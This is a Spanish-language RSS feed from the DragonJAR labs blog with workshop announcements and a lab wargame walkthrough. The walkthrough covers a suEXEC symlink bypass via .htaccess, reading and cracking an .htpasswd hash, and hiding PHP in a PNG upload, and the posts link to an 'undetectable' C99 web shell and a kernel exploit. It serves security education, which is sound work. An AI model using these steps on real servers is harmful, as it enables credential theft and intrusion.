Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)<br />
Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a 4v4t4r (en) gmail.com con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)<br />
<strong>Notas aclaratorias:</strong> Estos HackTalleres <strong>NO TIENEN NINGÚN COSTO</strong><br />
Pueden asistir todas las personas que confirmen su interés en participar.<br />
Buena disposición de aprendizaje.</p>
<p style="text-align: justify;">Cupos limitados, +/- 15 personas.</p>
<h2><a href="http://comunidad.dragonjar.org/index.php/topic,1328.msg6497.html#msg6497"><br />
<strong></strong></a><strong><a href="http://comunidad.dragonjar.org/index.php/topic,1328.msg6565.html#msg6565">http://comunidad.dragonjar.org/index.php/topic,1328.msg6565.html#msg6565</a></strong></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio de Informática Forense en Medellín</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin#comments</comments>
		<pubDate>Mon, 20 Oct 2008 16:04:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Laboratorio]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=271</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente <strong>muchas gracias</strong> a todos los asistentes a este 4° HackTaller en Medellín, que para esta oportunidad se desarrolló sobre Informática Forense con un caso práctico.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://img407.imageshack.us/img407/8455/portada2jj7.jpg" alt="HackTaller en Medellín" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando los diferentes recursos para este laboratorio (imágen del sistema a analizar, herramientas, videos de desarrollo, manuales y documentación).</p>
<p style="text-align: justify;">Por ahora publico el registro fotográfico <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<h2><a href="http://www.flickr.com/photos/31597104@N06/2958010755/" target="_blank"><strong>Fotografías del 4° HackTaller en Medellín &#8211; Informática Forense</strong></a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>HackTaller 04 en Medellín, Informática Forense</title>
		<link>http://labs.dragonjar.org/hacktaller-04-en-medellin-informatica-forense</link>
		<comments>http://labs.dragonjar.org/hacktaller-04-en-medellin-informatica-forense#comments</comments>
		<pubDate>Mon, 06 Oct 2008 14:32:31 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=265</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Post modificado:</p>
<p style="text-align: justify;">&#8220;Un saludo&#8230;</p>
<p>Lamento informarles que este próximo sabado se realizan las jornadas institucionales en el ITM, por lo tanto no se permite el ingreso a las sedes. <img src="http://comunidad.dragonjar.org/Smileys/default/sad.gif" border="0" alt="Triste" /> <img src="http://comunidad.dragonjar.org/Smileys/default/sad.gif" border="0" alt="Triste" /></p>
<p>Por ahora queda aplazado el laboratorio de informática forense, hasta el próximo sabado 18 de octubre.<br />
No contaba con esas jornadas y mucho menos que no se permitiera el ingreso a la sede <img src="http://comunidad.dragonjar.org/Smileys/default/sad.gif" border="0" alt="Triste" /><br />
Voy a ir publicando entonces el material para que lean y practiquen y podamos avanzar mucho más en el Lab. <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /> &#8221;</p>
<p style="text-align: justify;">Hago la invitación a la comunidad en general para que asistan a este cuarto HackTaller en Medellín.<br />
La temática específica será publicada en el transcurso de la semana, pero a  nivel general aprenderemos sobre informática forense con un caso práctico.</p>
<p><strong>Día:</strong> 18 de octubre de 2008<br />
<strong>Hora:</strong> 1:30 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10</p>
<p>Recomiendo la lectura del material publicado (<a href="http://labs.dragonjar.org/laboratorios-informatica-forense-introduccion-y-contenido" target="_blank"><strong>Introducción y contenido</strong></a>)</p>
<p>Recuerden que los cupos son limitados y se debe hacer un registro enviando un correo electrónico a (4v4t4r @ gmail.com) y publicando en este post.<br />
Les recuerdo también que estos laboratorios no tienen ningún costo <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-04-en-medellin-informatica-forense/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8220;Rooteo&#8221; a Sauron, solución alternativa</title>
		<link>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa</link>
		<comments>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa#comments</comments>
		<pubDate>Wed, 01 Oct 2008 01:49:17 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=261</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?action=profile;u=105" target="_blank"><strong>killr00t</strong></a>, quién constantemente asiste a los diferentes laboratorios que realizamos en la ciudad de Medellín, ha realizado una solución al HackTaller Sauron.</p>
<p style="text-align: justify;">En este, hace uso de un exploit local que afecta a los<strong> <a href="http://www.kriptopolis.org/bug-kernel-linux" target="_blank">kernel 2.6.x &#8211; 2.6.24.1</a></strong>.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/65165639/e013e5b7/Video_Killr00t.html" target="_blank"><strong>Descargar el video demostrativo de &#8220;rooteo&#8221; como solución alternativa al HackTaller 03</strong></a>.<br />
(Video + Exploit) password: www.dragonjar.org</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HackTaller 03 en Medellín</title>
		<link>http://labs.dragonjar.org/hacktaller-03-en-medellin</link>
		<comments>http://labs.dragonjar.org/hacktaller-03-en-medellin#comments</comments>
		<pubDate>Fri, 26 Sep 2008 16:43:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=256</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como mencioné anteriormente, estaba gestionando un lugar más adecuado para los laboratorios, por ello he logrado concordar con <a href="http://itmparatodos.itm.edu.co/index.php?option=com_content&amp;task=view&amp;id=791&amp;Itemid=30" target="_blank"><strong>Tecnosoft</strong></a> el laboratorio de mañana.</p>
<p>La idea de este primer laboratorio en dicha sede será la de incentivar el estudio e investigación en dicho campo, por esto, los asistentes serán los sysadmin, dba y webmasters de varias instituciones y proyectos</p>
<p>Por esta razón este lab estará un poco limitado en asistencia, pues como digo, la idea es primero mostrar nuestras ideas y proyectos, para poder contar con este espacio para nuestros laboratorios.</p>
<p>Por lo tanto los interesados deben enviarme un correo electrónico a <a href="mailto:4v4t4r@gmail.com">4v4t4r@gmail.com</a>.<br />
Quiero aclarar que para este primer lab se llevará a cabo el test de pentración a un aplicativo web que hemos realizado en laboratorios anteriores (SAURON), por lo tanto los que estén interesados en llevarlo a cabo pueden asistir, los que ya lo han realizado solo deben esperar hasta el próximo sabado para desarrollar el análisis forense al sistema comprometido.</p>
<p>Una vez realizado este lab, espero continuar realizandolos cada 8 días <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />&#8230; (todo depende del interés de la comunidad <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" />)</p>
<p>Mejor dicho, la idea es crear un equipo de investigadores en diferentes campos de la seguridad de la información y nada mejor para ello que contar con esta sede para este propósito. (Aula tipo académica, videobeam integrado, ventilación, internet, buenas máquinas, biblioteca, etc.).</p>
<p>Espero entonces los correo electrónicos.</p>
<p>Muchas gracias a los interesados, especialmente a <strong>Sebas</strong> por su invaluable colaboración con los laboratorios y la comunidad <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Tecnosoft &#8211; Parque Tecnológico<br />
Boston (antiguo Colegio San José, ahora ITM de Boston)<br />
Cr 31 # 54 – 10<br />
Tel: (574) 4600727 ext 5548</strong></p>
<h2><strong>Hora: 1 PM</strong></p>
<p><strong>Se debe confirmar asistencia por correo electrónico, cupos limitados</strong></h2>
<p><strong>Materiales: Cuaderno de notas y/o USB</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-03-en-medellin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (VI de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 19:53:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comandos Linux]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=246</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 5 publicado por <a href="http://sg6-labs.blogspot.com/2008/03/secgame-1-sauron-resolucin-nivel-5.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61351393/8da74e57/Solucionario_05_HackTaller_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org).</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank"></a><a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>,<a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>), <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">John The Ripper</a>, <a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; .<a href="http://mundogeek.net/archivos/2005/05/04/htaccess/" target="_blank">HTACCESS</a> &#8211; <a href="http://labs.dragonjar.org/comandos-habituales-en-linux" target="_blank">Comandos habituales en Linux</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211;  <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-246"></span>El nivel 5 es quizá uno de los momentos menos concretos de todos los que se pueden presentar. Ahora hemos conseguido ser usuarios locales del sistema, podemos ejecutar comandos, leer directorios, ver configuraciones, y podemos, en definitiva, explorar muchísimas posibilidades.</p>
<p>Sin embargo, hay que matizar algo importante, que puede servir para ahorrarnos muchas horas de trabajo inútil: si nos encontramos en un sistema actualizado, sin fallos de seguridad en el kernel y en otros servicios administrativos, es muy difícil, a menos que el administrador haya configurado algo de forma errónea, escalar privilegios directamente, hacia un usuario administrativo. ¿Qué podemos hacer entonces en estas situaciones?</p>
<p>Nuestro objetivo, en estos casos en los que ser &#8220;root&#8221; o &#8220;Administrador&#8221; no parece ser inmediato, será extraer la mayor cantidad de información del sistema, obtener el mayor número de cuentas de usuario posibles, etc.</p>
<p><strong>¿Cómo conseguir eso?</strong></p>
<p style="text-align: justify;">Primeramente, en los sistemas que tengan servicios web, nos centraremos en estos, ¿por qué?. Básicamente porque el aislamiento entre usuarios web, es quizá no complicado, pero sí tedioso. Es fácil encontrar escenarios en los que directamente podamos acceder a los directorios de otros usuarios en la web, y leer sus ficheros, porque todas estas carpetas pueden ser leídas por el usuario que ejecuta el servidor web ( apache, httpd, etc ). En otros escenarios los usuarios web estarán aislados usando cgi-wrappers. Y únicamente, en los entornos más avanzados y seguros, cada usuario web poseerá una máquina virtual o un vps, en la que sólo existirá él. En caso de no existir escenario web, otros escenarios posibles son por este orden: ficheros de configuración, ficheros temporales, ficheros de logs y permisos inseguros.</p>
<p>En este escenario que nos ocupa, relativamente común en un entorno de seguridad medio con árbol web (incluso muy común en granjas de servidores web), vamos a ver cómo se puede proceder. Lo primero, saber quiénes son los usuarios.</p>
<p><strong>blindware:x:500:500::/var/www/blindware:/bin/bash<br />
intranet:x:501:501::/var/www/intranet:/bin/bash<br />
developer:x:502:502::/home/developer:/bin/bash</strong></p>
<p>El sistema parece tener 3 usuarios. 2 de ellos, usuarios web, uno de los cuales es el usuario con el que podemos ejecutar comandos, y otro es el usuario “intranet”.</p>
<p>Podemos probar a acceder al directorio del usuario intranet (<strong>/var/www/intranet</strong>), pero rápidamente nos daremos cuenta, que poco podemos hacer, pues nos deniega el acceso. Incluso si intentamos leer <strong>/var/www</strong>, obtendremos resultado parecido, puesto que sus permisos son los siguientes:</p>
<p><strong>d&#8211;x&#8211;x&#8211;x 8 root root 4096 May 12 13:52 www</strong></p>
<p>Ésta situación es bastante común, sin embargo, hay un fichero en el sistema que nos será siempre de gran utilidad, y es la configuración del propio Apache, la cual habitualmente se encuentra desprotegida (en este caso dentro de <strong>/etc/httpd/httpd.conf</strong>).</p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin blindware@blindware.inc<br />
DocumentRoot /var/www/blindware/htdocs<br />
ServerName www.blindware.inc<br />
SuexecUserGroup blindware blindware<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin intranet@blindware.inc<br />
DocumentRoot /var/www/intranet/htdocs<br />
ServerName intranet.blindware.inc<br />
SuexecUserGroup intranet intranet<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p>De esta configuración, lo primero que extraemos, es que los hosts están aislados mediante Apache suEXEC, lo cual hace que PHP esté configurado para ejecución en modo CGI, en vez de cómo módulo de Apache, y por ello antes necesitábamos permisos de ejecución en los ficheros PHP. Tal y como comentamos con anterioridad, no es recomendable ir reinventando la rueda a cada paso, por ello, la pregunta que nos tenemos que hacer en este punto es: ¿existe algún procedimiento público y documentado que permita sobrepasar los mecanismos de aislamiento de hosts basados en Apache suEXEC?.</p>
<p>Existe, únicamente tenemos que buscar en Google: &#8220;<strong>apache suexec</strong>&#8220;, &#8220;<strong>apache suexec bypass</strong>&#8220;, o similares y encontraremos un documento denominado &#8220;<strong>Apache suEXEC Bypass</strong>&#8221; en el cual se nos detalla de forma bastante extensa los problemas de configuración asociados a éste sistema.</p>
<p>A grandes rasgos, nosotros vamos a sacar lo más interesante del documento, para hacernos una idea de cómo podemos proceder para leer ficheros dentro del directorio web del usuario intranet.</p>
<p><strong>1.</strong> Los diferentes hosts virtuales de Apache, mediante suEXEC, lo que consiguen es que cada host ejecute comandos CGI, bajo un usuario diferente. De esta forma, por ejemplo, nosotros ejecutamos comandos con “blindware”, mientras que el vhost intranet, ejecuta comandos con el usuario “intranet”.</p>
<p><strong>2.</strong> Esto permite un esquema de aislamiento “relativamente” sencillo.</p>
<p><strong>drwxr-x&#8212; 3 blindware apache 4096 nov 25 17:00 blindware<br />
drwxr-x&#8212; 3 intranet apache 4096 nov 25 17:00 intranet</strong></p>
<p>Si nos damos cuenta, cada usuario es propietario de su directorio, y ningún otro usuario puede acceder a ellos, a excepción del usuario apache, con el que se ejecuta el servicio web. Esto &#8220;garantiza&#8221;, que aunque el usuario ejecute comandos en el sistema, ningún usuario podrá acceder al directorio de otro usuario.</p>
<p><strong>3.</strong> Esta idea, cuenta con un fallo: el enlace simbólico. Los enlaces simbólicos se pueden establecer sobre ficheros en los que no tenemos permisos. Dicho de otra forma, nosotros como usuario “blindware”, podemos enlazar cualquier fichero del usuario “intranet”, del que conozcamos su existencia.</p>
<p><strong>4.</strong> Una vez enlazado el fichero, podremos usar Apache, para leer el enlace simbólico, de esta forma, el enlace simbólico será leido con los permisos de Apache, usuario Apache, y podremos acceder a aquellos directorios a los que Apache tenga acceso, que comúnmente son todos los del árbol web, puesto que debe poder leerlos.</p>
<p><strong>5.</strong> Para que el ataque tenga éxito Apache, es así por defecto, debe estar activa la opción <strong>FollowSymLinks</strong> en Apache. Por el contrario, si la opción que se encuentra activa es <strong>SymLinksIfOwnerMatch</strong>, el ataque no se podrá realizar, puesto que Apache, únicamente seguirá enlaces que apunten a ficheros propiedad del dueño del enlace.</p>
<p><strong>6.</strong> En caso de estar activa la directiva <strong>SymLinksIfOwnerMatch</strong>, podrá ser modificada por un usuario mediante un fichero <strong>.htaccess</strong>, siempre que las opciones <strong>AllowOverride Options</strong>, o <strong>AllowOverride All</strong>, estén habilitadas.</p>
<p>A priori, parece que nos encontramos en un escenario vulnerable: se usa <strong>suEXEC</strong>, y aunque se encuentra habilitada la opción <strong>SymLinksIfOwnerMatch</strong>, también está habilitada la cláusula <strong>AllowOverride All</strong>. Por tanto, es cuestión de proceder, a través de nuestra shell en PHP según lo que vamos a describir a continuación. Un detalle importante, cuando queramos ejecutar contenido en nuestra shell PHP, cualquier instrucción que incluya caracteres mínimamente extraños, debemos hace uso de URLEncode.</p>
<p><strong>1.</strong> Lo primero que queremos hacer es escribir un fichero <strong>.htaccess</strong> que nos permita aprovecharnos de esta vulnerabilidad. La orden bien pudiera ser esta.</p>
<p><strong>echo &#8220;Options -SymLinksIfOwnerMatch +FollowSymLinks&#8221; &gt; .htaccess</strong></p>
<p>Pero como sabemos, debe ser URLEncodeada, quedando una cadena, para su ejecución en nuestra shell, como la siguiente:</p>
<p><strong>echo+%22Options+-SymLinksIfOwnerMatch+%2BFollowSymLinks%22+%3E+.htaccess</strong></p>
<p><strong>2. </strong>Ahora es cuestión de crear un enlace simbólico, sobre algún contenido que nos interese leer del directorio “intranet”. En este caso, lo más interesante es leer el fichero .htaccess de ese directorio, del que nos garantizamos su existencia, y que además nos impide el acceso al contenido web de <strong>http://intranet.blindware.inc</strong>.<br />
Creamos pues el enlace simbólico:</p>
<p style="text-align: justify;"><strong>ln –s /var/www/intranet/htdocs/.htaccess htaccess</strong></p>
<p>De esta forma, tenemos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htacccess</strong>, que una vez visitado nos dará el contenido del fichero:</p>
<p><strong>Options +Indexes<br />
AuthName &#8220;Blindware &#8211; Intranet Protected&#8221;<br />
AuthType Basic<br />
AuthUserFile /var/www/intranet/htdocs/.htpasswd<br />
require valid-user</strong></p>
<p><strong>3.</strong> Repetimos el proceso, una vez que conocemos la localización del fichero .htpasswd. Para ello creamos otro enlace simbólico: <strong></strong></p>
<p style="text-align: justify;"><strong>ln -s /var/www/intranet/htdocs/.htpasswd htpasswd</strong></p>
<p>De esta forma, creamos un enlace directo, en nuestro directorio <strong>http://www.blindware.inc/_controlp/htpasswd</strong>, que una vez visitado nos dará el contenido del fichero.</p>
<p><strong>admin:tCPJIYCZjtqF6</strong></p>
<p><strong>4.</strong> Tenemos el usuario, y el hash del acceso a intranet.blindware.inc, podemos bien intentar crackearlo, bien seguir intentando la lectura de ficheros contenidos en ese directorio. A priori es un hash DES tradicional, con lo cual podemos intentar romperlo, a ver qué sucede.</p>
<p>Para romper el hash, hacemos uso de la herramienta “john the ripper”, que es con diferencia el crackeador de passwords más conocido de Unix.</p>
<p><strong>$ john htpasswd</strong><br />
<strong>guesses: 1 time: 0:00:00:10 (3) c/s: 335628 trying: 132449 &#8211; 132498<br />
Loaded 1 password hash (Traditional DES [64/64 BS MMX])<br />
132456 (admin)</strong></p>
<p>Pues ya conocemos el password: 132456 con usuario admin. Lo que nos permite acceder a intranet.blindware.inc y seguir avanzando en la resolución de Sauron. Dentro de 15 días, continuaremos con el siguiente nivel.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (V de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 17:25:04 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=242</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 4 publicado por <a href="http://sg6-labs.blogspot.com/2008/02/secgame-1-sauron-resolucin-nivel-4.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61331624/79bc3574/Solucionario_HackTaller_DragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org) &#8211; Incluye la Shell C99 codificada en base 64 &#8220;no detectable&#8221;.</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell Linux</a>/<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> (incluido en <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">backtrack</a>-<a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a>), <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>)<a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://www.tips.cl/viewtopic.php?p=52&amp;sid=4c922498c6ef26b0056db3390cb08fa8" target="_blank">Comando CAT</a>, <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-242"></span><strong>Este es el aspecto que presenta el nivel 4. Dividido en 4 secciones:</strong></p>
<ul>
<li>Información sobre el sistema</li>
<li>Administración de MySQL mediante MySQL Admin</li>
<li>Visualización de Estadísticas</li>
<li>Cambio de parámetros</li>
</ul>
<p style="text-align: justify;">Sobre la visualización de estadísticas, poco hay que comentar. Ya nos es familiar porque ya hemos accedido a ella, pero desde otro lugar, durante el nivel 2, por tanto no aporta nada a lo que ya conocemos.</p>
<p>Luego existen 2 partes que contienen aplicaciones públicas, por un lado tenemos phpSysInfo, y por otro phpMyAdmin. En la idea original de este juego está el que no sea necesario el uso de fallos en aplicativos públicos para superarlo, siendo así por un motivo bien sencillo: con el paso del tiempo uno o todos los aplicativos que existen instalados en la máquina virtual serán susceptibles de fallos.</p>
<p>No obstante, podemos evaluar la seguridad de estas versiones, y ver que no parecen existir exploits públicos relevantes para las mismas. Existe un XSS en phpSysInfo, poco relevante para una explotación efectiva, al igual que otro en phpMyAdmin. Comentar como apunte que el hecho de que a fecha de hoy no parezcan existir ataques relevantes no quiere decir, evidentemente, que en un futuro no puedan aparecer, e incluso, y dado que son aplicaciones de código abierto, una vez agotadas el resto de vías, es posible que una revisión exhaustiva de su código fuente, y de su ejecución, pueda revelarnos fallos de seguridad no públicos.</p>
<p>Sin embargo, en el caso que nos ocupa, antes de llegar a la revisión de código público, hay que percatarse de la sección &#8220;Cambio de parámetros&#8221; la cual permite la subida de un fichero al servidor. Ésta *siempre* es una función crítica y debe ser evaluado su riesgo, ya que permitirá al atacante subir algún tipo de contenido a nuestro sistema.</p>
<p>Para el caso que nos ocupa, podemos darnos cuenta que la robustez y codificación de la subida de imágenes es la apropiada:</p>
<ul>
<li>Únicamente permite ficheros con extensión PNG</li>
<li>El tamaño del fichero está limitado a 8KB</li>
<li>El contenido del fichero debe corresponder con una imagen PNG</li>
</ul>
<p style="text-align: justify;">Esto hace que no podamos subir un fichero renombrado como .PNG, sino que debamos subir un gráfico PNG, limitado a 8KB, y con extensión PNG. Por tanto, a priori, podemos pensar que no existe posibilidad alguna de explotar ningún fallo. Bien, veremos que no es así.</p>
<p>Lo primero que debemos plantearnos es: ¿en una imagen PNG únicamente puede existir eso?. La respuesta es que no. Nada más sencillo que concatenar al final de un fichero PNG, código ejecutable en formato PHP. Para ello, a partir de una imagen PNG de menos de 8KB y válida para subirla al servidor, hacemos lo siguiente:</p>
<p><strong>$ cat &gt;&gt; img.png<br />
&lt;? phpinfo(); ?&gt;</strong></p>
<p>Para los no familiarizados con UNIX, decir que simplemente hemos añadido al final del fichero ese código PHP. Una vez hecho esto, tendremos un fichero válido, en formato PNG, que contiene al final del mismo un código PHP. Este fichero podrá ser subido al servidor.</p>
